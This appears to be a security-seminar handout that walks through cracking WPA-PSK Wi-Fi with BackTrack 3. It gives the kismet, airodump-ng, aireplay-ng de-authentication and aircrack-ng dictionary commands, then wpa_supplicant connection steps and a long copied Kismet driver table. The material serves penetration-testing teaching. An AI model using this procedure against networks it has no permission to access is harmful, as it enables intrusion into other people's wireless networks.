Wireless Penetration Testing: Cracking
WPA-PSK
Security Seminar by:
Edward Brian Drumheller Jr.
Joseph
Allan Krug Esquire
Justin Thomas Lewis
Preparation
For this Seminar we are using a bootable Linux Cd-rom Distribution, BackTrack 3 Beta - 14-12-2007. This is a fully operational operating system that boots from a cd. In order to go forth with this Seminar you will need a CD-R drive and a CD-R or CD-rw disc in which to burn the image file to. You can go to http://www.remote-exploit.org/backtrack_download.html to find the image file from various different mirror websites. Once you obtain the image (the file is 700mb so it can take a while to download), burn it to a cd. If you do not have any programs that allow you to do this, download a program like this one http://cdburnerxp.se/
Once finished, shut your computer down, and restart. You may need to go into your BIOS in order to change the default boot order so that a CD-rom will boot before your hard drive. Pay attention when your system first boots up, there should be a selection for the BIOS often called "setup". Inside find where you can switch the boot order, commonly under "boot". Save settings and exit.
Your system should now restart.
If prompted, press any key to boot to the live disc.
when asked, booted in the KDE option.
Once the desktop loads follow these directions...
Open up a Terminal Windows and run command
“wget http://eddrumheller.com/pen/word.lst”
This file will be downloaded to your home directory and used later
Cracking WPA-PSK
1.
Open up a Terminal Windows and run command
“iwconfig”
2.
Write down the interface that has wireless
extensions
3.
Make sure the mode of the card is set to
Monitor
a.
If mode is set to Managed, run the command “iwconfig wirelessAdapter mode monitor”
4.
Open the conf file by running the command vi /usr/local/etc/kismet.conf 
Change line 27 "# source=none,none,addme" to "sources=<kismetDriver>,<wirelessAdapter>,<wireless>"
Run kismet by running the command "kismet"
in the Terminal. Code will be produced, and a GUI interface will display inside
of the menu.
a.
Press h to view the
help menu
b.
Press x to close any
pop-up menu
c.
Press s
to bring up sort menu
d.
Press b to sort by
BSSID
e.
Highlight Name “dd-wrt”
f.
Press Enter
to view information
g.
Write down BSSID and Channel Number.
h.
Close the kismet terminal window (Mandatory)
5.
Open up a new terminal and type the command
“airodump-ng -c <channel of AP>
--bssid <AP's bssid> -w capture eth0
a.
Leave this window
open, this program will be intercepting the
handshake.
6.
“Open up another terminal and type “aireplay-ng
-0 5 -a <AP's bssid> -c <client's bssid> eth0 to issue a
de-auth packet to the client’s machine who is already authenticated
7.
View the Aireplay and Airodump terminals
side by side. If the injection worked, WPA
Handshake <BSSID> will be displayed in the upper right hand corner of
Airodump.
a.
The capture of the handshake is now stored in your home
directory
8.
crack the handshake with aircrack using the
command
aircrack-ng -w <location of a dictionary file>
-b <AP's bssid> capture*.cap
Note: the key will be displayed once it is
found.
Directions to connect to an AP secured with WPA in BackTrack2
To
connect to WPA, there is a little bit of work needed:
* The creating of a conf file
* Running the script
Creating the .conf file:
open your favourite editor and add the following code
network={
ssid="youraccesspointname"
psk="youraccesspointspassword"
}
Save this in /root as wpa.conf
Running the script:
First run this command
wpa_supplicant -i eth0 (change to your
adaptor) -c wpa.conf
-i = specifies what interface to use
-c = specifies the location of the .conf
file
This should bring up a message that states
that the connection has been successful.
It is important not to close this shell
then open another shell and type
dhcpcd eth0 (change to your adaptor)
Test the connection. 
KISMET Documentation
12.
Capture Sources
A capture source in Kismet is anything
which provides packets to the Kismet
engine. Capture sources define the underlying engine
needed to capture
data from the
interface, how to change channel, and how to enter rfmon
mode. It is necessary to tell Kismet what specific
type of card you use
because different
drivers often use different methods to report information
and enter monitor
mode.
Source type Cards OS Driver
--------------- -------------------
----------- -------------------------
acx100 TI ACX100 Linux ACX100
http://acx100.sourceforge.net/
ACX100 drivers handle the
22mbit cards branded by D-Link
and
others.
admtek ADMTek Linux ADMTek
http://www.latinsud.com/adm8211/
(Patches)
http://aluminum.sourmilk.net/adm8211/
(GPL driver)
ADMTek drivers used in many
consumer 802.11b cards. With
the
patches above, quasi-rfmon is possible - these cards
appear
to be almost entirely software controlled and
always
in a rfmon-like state. This card WILL
BROADCAST
while
in rfmon, rendering the sniffer visible.
The fully GPL drivers are
supported, in addition to the
hacks
to the non-free drivers.
airpcap Airpcap USB cygwin CACE Tech
http://www.cacetech.com/products/airpcap.htm
The CACE AirPcap USB device
allows native capture on
Win32/Cygwin.
The explicit airpcap source
expects the Win32/Cygwin
interface
name. This should be used once the
source
is
identified via airpcap_ask or if multiple simultaneous
sources
are required.
airpcap_ask Airpcap USB cygwin CACE Tech
http://www.cacetech.com/products/airpcap.htm
The CACE AirPcap USB device
allows native capture on
Win32/Cygwin.
The airpcap_ask source
lists available airpcap devices
and
allows the user to pick interactively.
The 'capture interface' field
is irrelevant and can be
filled
with any value (for example, 'dummy')
atmel_usb Atmel-USB Linux Berlios-Atmel
http://at76c503a.berlios.de/
These drivers work ONLY on
USB cards (Sorry, no PCMCIA
support). Monitor mode support is limited and
"faked"
by
bypassing part of the firmware and parsing packets
directly,
and is likely to not report all of the
frames.
This card MAY BROADCAST
while in rfmon, rendering the
sniffer
visible.
It appears that this card
may be only formatting the
beacons
as an 802.11 stream, which means you likely
will
not see data frames, rendering most IDS functions,
IP discovery,
and data logging unavailable.
ath5k Atheros Linux Kernel/Madwifi
http://madwifi.org
Based on the OpenBSD
OpenHAL, the Ath5k drivers are the
future
of Atheros support and will be mainlined into the
Linux
kernel.
ath5k_a
Atheros Linux Kernel/Madwifi
http://madwifi.org
Ath5k source for 11a only
ath5k_ag Atheros Linux Kernel/Madwifi
http://madwifi.org
Ath5k source for 11a/11g
bcm43xx Broadcom Linux BCM43XX
http://bcm43xx.berlios.de,
kernel
Linux native broadcom
drivers incorporated into modern
kernels.
b43 Broadcom Linux
B43 broadcom drivers for
current Broadcom devices in
Linux kernels
b43legacy Broadcom Linux
B43 broadcom drivers for
legacy Broadcom devices in
Linux kernels
cisco Aironet 340,350 Linux
Kernel 2.4.10 - 2.4.19
Standard Cisco cards in
Linux. Works only with
the
Linux kernel drivers, not the drivers found in
pcmcia-cs.
The drivers found on the
cisco.com site can be patched
with
the files from the Kismet download site to add
monitor
mode with channel control, HOWEVER these drivers
are
extremely buggy for normal use and work only with
the
2.4 kernel tree.
The cisco drivers currently
do not enter rfmon mode
correctly,
so channel control is not available. The
firmware
will hop to whatever channel it feels like
hopping
to, when it feels like hopping.
cisco_wifix Aironet 340,350 Linux
Kernel 2.4.20+, CVS
http://sourceforge.net/projects/airo-linux/
Capture interface: 'ethX:wifiX'
Kernel 2.4.20+ and CVS
drivers use ethX for normal mode
and
wifiX for monitor mode. Kismet needs to
know both
devices,
which may not necessarily be the same number,
for
example 'eth1:wifi0'.
Linux kernel 2.4.20 and
2.4.21 have highly unstable cisco
drivers
and should be avoided.
The cisco drivers currently
do not enter rfmon mode
correctly,
so channel control is not available. The
firmware
will hop to whatever channel it feels like
hopping
to, when it feels like hopping.
darwin OSX native cards OSX/Darwin
OSX
Supports
both Broadcom and Atheros Airport-Extreme cards.
When using a Broadcom based
card, it may be necessary to
enable rfmon on
the device for the first time using another
program.
When using an Atheros based
card, 802.11a may also be supported
by
adding a 'sourcechannels' line to kismet.conf.
hostap Prism/2 Linux HostAP 0.4
http://hostap.epitest.fi/
HostAP drivers drive the
Prism/2 chipset in access point
mode,
but also can drive the cards in client and monitor
modes. The HostAP drivers seem to change how they go
into
monitor mode fairly often, but this source should
manage
to get them going.
ipw2100 Intel/Centrino Linux ipw2100-0.44+
http://ipw2100.sourceforge.net/
The Linux IPW2100/Centrino
drivers for 802.11b cards
now
support rfmon, so here's support for them.
They act
more
or less like any other wireless interface would.
ipw2200 Intel/Centrino Linux ipw2200-1.0.4+
http://ipw2200.sourceforge.net/
The Linux IPW2200/Centrino
drivers for 802.11bg cards
support
rfmon as of 1.0.4 and firmware 2.3.
Signal level reporting
requires radiotap be turned on
in
the makefile while compiling the driver.
Noise levels
are
not reported.
ipw2915 Intel/Centrino Linux ipw2200-1.0.4+
http://ipw2200.sourceforge.net/
The Linux IPW2200/Centrino
drivers for 802.11bga cards
support
rfmon as of 1.0.4 and firmware 2.3.
This is the same as ipw2200
but defaults to scanning the
802.11a channel range in
addition to 802.11b/g.
Signal level reporting
requires radiotap be turned on
in
the makefile while compiling the driver.
Noise levels
are
not reported.
ipw3945 Intel/Centrino Linux ipw3945
http://ipw3945.sourceforge.net/
The Linux IPW3945/Centrino
drivers for Intel Core
802.11bga cards.
ipwlivetap Intel/Centrino Linux ipw2200/3945
http://ipw2200.sourceforge.net/
http://ipw3945.sourceforge.net/
The ipw3945 and patched
ipw2200 drivers support a
special
mode which allows monitor-mode style sniffing
while
remaining associated. Channel hopping is
not
possible,
as the card is still associated to a
specific
AP, but single-channel IDS and sniffing can
be
accomplished. See the ipw driver mailing
list
archives
for information about patching your drivers.
iwl3945 Intel/Centrino Linux iwl3945
Intel's new IPW drivers using the mac80211
kernel
layer.
iwl4965 Intel/Centrino Linux iwl4965
Intel's new IPW drivers
using the mac80211 kernel
layer.
kismet_drone n/a Any n/a
Capture interface: 'dronehost:port'
The remote drone capture
source connects to a Kismet
drone
and processes the packets. Refer to the
Remote
Drone section of the README for
more details about how
to
set up a drone.
madwifi_a Atheros Linux madwifi
http://sourceforge.net/projects/madwifi/
Capture interface: 'athX'
Capture interface: 'wifiX' (Madwifi-NG)
Madwifi
drivers in 802.11a-only mode.
When using madwifi-ng, be
sure all non-monitor VAPs have
been
removed, otherwise madwifi will not properly report
most
traffic.
madwifi_b Atheros Linux madwifi
http://sourceforge.net/projects/madwifi/
Capture interface: 'athX'
Capture interface: 'wifiX' (Madwifi-NG)
Madwifi
drivers in 802.11b-only mode.
When using madwifi-ng, be
sure all non-monitor VAPs have
been
removed, otherwise madwifi will not properly report
most
traffic.
madwifi_g Atheros Linux madwifi
http://sourceforge.net/projects/madwifi/
Capture interface: 'athX'
Capture interface: 'wifiX' (Madwifi-NG)
Madwifi drivers in 802.11g-only mode.
This will,
obviously,
also see 11b networks.
When using madwifi-ng, be
sure all non-monitor VAPs have
been
removed, otherwise madwifi will not properly report
most
traffic.
madwifi_ab Atheros Linux madwifi
http://sourceforge.net/projects/madwifi/
Capture interface: 'athX'
Capture interface: 'wifiX' (Madwifi-NG)
Madwifi
drivers in 802.11a and 802.11b combo mode. This
will
seamlessly switch between bands during channel
hopping.
When using madwifi-ng, be
sure all non-monitor VAPs have
been
removed, otherwise madwifi will not properly report
most
traffic.
madwifi_ag Atheros Linux madwifi
http://sourceforge.net/projects/madwifi/
Capture interface: 'athX'
Capture interface: 'wifiX' (Madwifi-NG)
Madwifi
drivers in 802.11a and 802.11g combo mode. This
will
seamlessly switch between bands during channel
hopping.
When using madwifi-ng, be
sure all non-monitor VAPs have
been
removed, otherwise madwifi will not properly report
most
traffic.
madwifing_a
Atheros Linux madwifi-ng
madwifing_ab Atheros Linux madwifi-ng
madwifing_ag Atheros Linux madwifi-ng
madwifing_g Atheros Linux madwifi-ng
madwifing_b Atheros Linux madwifi-ng
http://sourceforge.net/projects/madwifi/
Capture interface: 'wifiX'
*Deprecated*. Detection for madwifi-ng is built into
the standard
madwifi sources. The _ng source names
have
been kept to allow old configs to continue
functioning.
nokia770 Nokia/TI Linux Nokies/TI
http://maemo.org/
Nokia770 capture
interface. Includes support for
validating
frame checksums to screen out junk
packets,
since the drivers pass us all data.
orinoco Lucent, Orinoco Linux Patched orinoco_cs
http://airsnort.shmoo.com/orinocoinfo.html
The Orinoco drivers which
have mainlined into the Linux
kernel
do support monitor mode, however only specific firmware
versions
are supported and often they do not work.
An up-ported version of the
older Orinoco drivers which more
reliably
supported rfmon may be available at:
http://www.projectiwear.org/~plasmahh/orinoco.html
Generally, Orinoco cards
are not recommended for use with
Kismet
due to these limitations.
orinoco_14 Lucent, Orinoco Linux
Orinoco 0.14+
https://savannah.nongnu.org/projects/orinoco/
This source is deprecated
and should only be used with
pre-release
versions of a driver since merged into the Linux
kernel.
pcapfile n/a Any n/a
Capture interface: '/path/to/file'
The pcapfile capture source
feeds a stored 802.11-encap
dump
file through the Kismet engine again.
This can be
useful
for debugging or rescanning old logs for
alert
conditions. Pcapfile sources are only
available
if
Kismet was compiled with libpcap support.
prism2_openbsd Prism/2 OpenBSD Kernel
Full support for
Prism2 under OpenBSD.
prism54g PrismGT Linux prism54
http://www.prism54.org
PrismGT 802.11g drivers
supporting monitor mode.
radiotap_bsd_ab
Radiotap BSD Kernel
Dual-band cards with
radiotap headers.
radiotap_bsd_a
Radiotap BSD Kernel
802.11a cards (or dual-band
on 11a channels only) with
radiotap
headers.
radiotap_bsd_b
Radiotap BSD Kernel
802.11b/g cards (or
dual-band on 11b channels only) with
radiotap
headers.
rt2400 Ralink 2400 11b Linux
rt2400-gpl
http://rt2x00.serialmonkey.com/
Ralink 2400 802.11b cards
using the serialmonkey GPL'd
rt2x00
drivers. Must use
1.2.2 beta 2 or newer drivers.
rt2500 Ralink 2500 11g Linux
rt2500-gpl
http://rt2x00.serialmonkey.com/
Ralink 2500 802.11g cards
using the serialmonkey GPL'd
rt2x00
drivers. Must use
1.1.0 beta 2 or newer drivers.
rt73 Ralink 73 11g
Linux rt73-gpl-cvs
http://rt2x00.serialmonkey.com/
Ralink 73 802.11g USB cards
using the serialmonkey GPL'd
rt79
drivers (tested only with CVS driver versions)
rt8180 Realtek 8180 11b Linux
rtl8180-sa2400
http://rtl8180-sa2400.sourceforge.net/
Realtek 8180 based cards
(there seem to be an awful lot of
them)
using the GPL drivers.
viha Airport OSX viha
http://www.dopesquad.net/security/
Monitor mode support for
Airport under OSX. Does not
support
Airport Extreme.
vtar5k Atheros 802.11a Linux
vtar5k
http://team.vantronix.net/ar5k/
vtar5k
drivers handle some Atheros 802.11a cards.
Chances
are
you'll have better luck with madwifi drivers.
wlanng_legacy Prism/2 Linux wlan-ng 0.1.3 and earlier
http://www.linux-wlan.com/
Old wlan-ng drivers didn't
support pcap capturing and
use
a netlink socket to the kernel. These
are still in
use
on some embedded systems (like the Zaurus).
wlanng Prism/2 Linux wlan-ng 0.1.4 - 0.1.9
http://www.linux-wlan.com/
Wlan-ng
prism2 drivers prior to the AVS headers.
wlanng_avs Prism/2 Linux wlan-ng 0.2.0+
http://www.linux-wlan.com/
Newer wlan-ng drivers
support a new header type and
slightly
different monitor commands to report wepped
packets.
wrt54g Linksys WRT54G Linux linksys
http://seattlewireless.net/index.cgi/LinksysWrt54g
Capture interface: 'ethX'
Capture interface: 'ethX:prismX'
Support for the drivers found in the
embedded Linux
inside
the Linksys WRT54G (and probably other APs using
the
same firmware).
Newer firmwares (such as
OpenWRT) use the prism0 device
for
monitor mode data. On these firmwares,
specify both
interfaces
(wrt54g,eth1:prism0,foo)
wsp100 NetChem WSP100 Any n/a
http://networkchemistry.com/
Capture interface: 'host:port'
The WSP100 is an embedded
device which reports 802.11
packets
over UDP. The wsp100 capture source is
(generally)
system agnostic, however over time it has
been
less maintained than others. If you'd
like to
send
me patches for this, please let me know.
zd1211 ZyDAS USB Linux zd1211
http://zd1211.ath.cx
The ZD1211 drivers have had some
regressions which lead to
data
corruption while changing channel. Some
versions
work,
and typically the aircrack patches resolve the
corruption
issues if your version doesn't properly handle
rfmon.
Chipsets known to NOT WORK:
Broadcom - No linux drivers, only useable
with ndiswrapper or
linuxant
wrappers around windows drivers.
*** UPDATE ***
See the bcm43xx
source type entry. There are
experimental
reverse-engineered drivers which have
monitor
mode support now under Linux! If they don't
work,
however, then too bad.
Airport Extreme - Really a Broadcom, with no rfmon in the
OSX drivers.
*** UPDATE ***
See the bcm source
for linux on ppc, it MAY work, it
may
not. Currently theres no solution for
OSX but
I'm looking for OSX
hackers interested in redoing the
Kismet
port and looking into adding more support.
Atmel - There is a hack for pseudo-monitor in
USB. There is
currently
no equivalent hack for PCMCIA.
HermesII - Proxim successor to the
Orinoco/HermesI. No support
yet
in the drivers, may be available in the future.
ndiswrapper - Anything using ndiswrapper is using
WINDOWS drivers
AND CAN NOT BE USED
WITH KISMET.
More Detailed Information about Kismet, visit
kismetwireless.net/documentation.shtml